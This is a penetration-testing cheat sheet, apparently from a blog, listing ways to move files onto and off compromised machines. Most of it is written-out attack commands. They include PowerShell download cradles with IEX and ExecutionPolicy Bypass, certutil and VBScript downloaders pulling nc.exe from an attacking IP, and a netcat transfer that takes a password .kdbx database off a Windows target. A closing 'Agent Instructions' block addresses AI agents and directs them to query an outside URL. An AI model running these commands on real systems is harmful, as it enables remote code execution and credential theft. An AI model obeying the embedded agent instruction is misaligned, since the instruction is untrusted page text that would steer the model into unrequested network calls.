# Transferring Files There are various ways to transfer files once an initial foot has been made. #### HTTP The simplest way to transfer files from one box to another is by using Python SimpleHTTPServer module as can be seen below: ``` python -m SimpleHTTPServer ``` #### Powershell ``` powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.10.20/nc.exe','c:\temp\nc.exe') ``` ``` powershell.exe -c (Start-BitsTransfer -Source "http://10.10.10.20/nc.exe -Destination C:\temp\nc.exe") ``` ``` powershell wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe" ``` ``` powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.20/nc.exe')" ``` ``` echo $storageDir = $pwd > wget1.ps1 echo $webclient = New-Object System.Net.WebClient >> wget1.ps1 echo $url = "http://10.10.10.20/nc.exe" >> wget1.ps1 echo $file = "new-nc.exe" >> wget1.ps1 echo $webclient.DownloadFile($url,$file) >> wget1.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget1.ps1 ``` #### Certutil ``` certutil.exe -urlcache -split -f "http://10.10.10.20/nc.exe" c:\temp\nc.exe ``` #### VBScript ``` echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs ``` #### TFTP ``` On Linux: mkdir /tftp atftpd --daemon --port 69 ~/tftp On Windows: tftp -i 10.10.10.20 GET nc.exe ``` #### FTP Install it first and start service ``` apt-get install pure-ftpd service pure-ftpd start ``` Set up the attacking machine On the target machine run: ``` echo open 10.10.10.32 21> ftp1.txt <--- Attacking IP echo username>> ftp1.txt <--- Your username echo password>> ftp1.txt <--- Your password echo binary>> ftp1.txt echo GET executable.exe>> ftp1.txt echo bye>> ftp1.txt ftp -s:ftp1.txt ``` #### SMB ``` On Kali-Linux: python /usr/share/doc/python-impacket/examples/smbserver.py dir-name . python3 /usr/share/doc/python3-impacket/examples/smbserver.py dir-name . On Windows: copy \\KALI_IP\dir-name\name_of_the_file_you_want_to_transfer . ``` **Base64 transfer binaries** ``` # On target base64 -w0 /path/to/binary <-- copy the content and save into a .b64 file. # On my kali base64 -d filename.bs64 > mybinary chmod +x mybinary ``` #### Windows to Linux ``` ### On a Windows Target ### nc.exe -v -w 30 -p 4444 -l < some_password.kdbx listening on [any] 4444 ... ### ON MY KALI ### nc -v -w 2 TARGET_IP 4444 > password.kdbx TARGET_IP [TARGET_IP ] 4444 (?) open ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ed4m4s.blog/transferring-files.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.